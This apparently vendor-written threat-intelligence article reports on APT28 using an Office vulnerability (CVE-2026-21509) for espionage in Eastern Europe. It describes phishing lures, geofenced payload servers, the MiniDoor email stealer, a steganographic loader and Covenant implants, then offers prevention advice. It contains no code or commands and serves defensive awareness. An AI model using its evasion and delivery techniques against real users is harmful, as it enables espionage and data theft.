Cybersecurity researchers uncovered attacks by a Russian-linked group. APT28 uses a new Microsoft Office vulnerability. They target users in Ukraine, Slovakia, and Romania for espionage.
The Vulnerability Details
The flaw is CVE-2026-21509 with a 7.8 severity score. It allows attackers to bypass security features. For example, a crafted Office file triggers unauthorized actions. Microsoft and other experts discovered and reported it. APT28 exploited the bug just days after disclosure. They started attacks on January 29, 2026. Therefore, quick patching became urgent for affected users.
Attackers send emails in English and local languages. These messages use convincing regional topics. However, they include malicious RTF files. The files exploit the flaw to deliver dangerous payloads.
They use server-side tricks for evasion. Servers send malware only to targeted regions. Additionally, they check the correct browser header. This avoids detection during analysis.
Two Different Attack Paths
One path drops MiniDoor, an email stealer. This C++ DLL grabs messages from Inbox, Junk, and Drafts. It forwards them to attacker-controlled email accounts. Researchers link it to a known spyware variant.
The second path uses PixyNetLoader. This dropper sets up more complex chains. It hides payloads inside itself. For instance, it includes a shellcode loader and a PNG image.
Advanced Payload Delivery
The loader checks the environment first. It activates only on real machines. Moreover, it runs when launched from explorer.exe. If conditions fail, the malware stays dormant.
The shellcode hides inside a PNG using steganography. It loads a .NET assembly afterward. This assembly acts as a Covenant Grunt implant. It gives attackers full remote control.
Links to Earlier Campaigns
This chain matches a prior APT28 operation. That campaign used VBA macros instead of DLLs. However, it kept similar techniques. Examples include COM hijacking and XOR encryption.
Both deliver Covenant Grunt implants. Steganography hides the loader in images. Therefore, the group refines its methods over time.
Ukraine’s cyber response team also reported attacks. APT28 used Word documents against officials. They hit over 60 government email addresses. Metadata shows files created on January 27, 2026.
Opening the lure connects via WebDAV. It downloads a shortcut with malicious code. This triggers the PixyNetLoader chain. Consequently, Covenant implants infect targeted systems.
Prevention Strategies
Organizations can block these threats with strong defenses. First, apply security patches for Office immediately. Enable protected view and block macros by default. Moreover, use continuous monitoring to detect unusual network connections or file downloads early.
Train staff to avoid suspicious attachments. Implement strict email filtering for RTF and shortcut files. These steps greatly reduce risks from exploited vulnerabilities and espionage implants.
Sleep well, we got you covered.
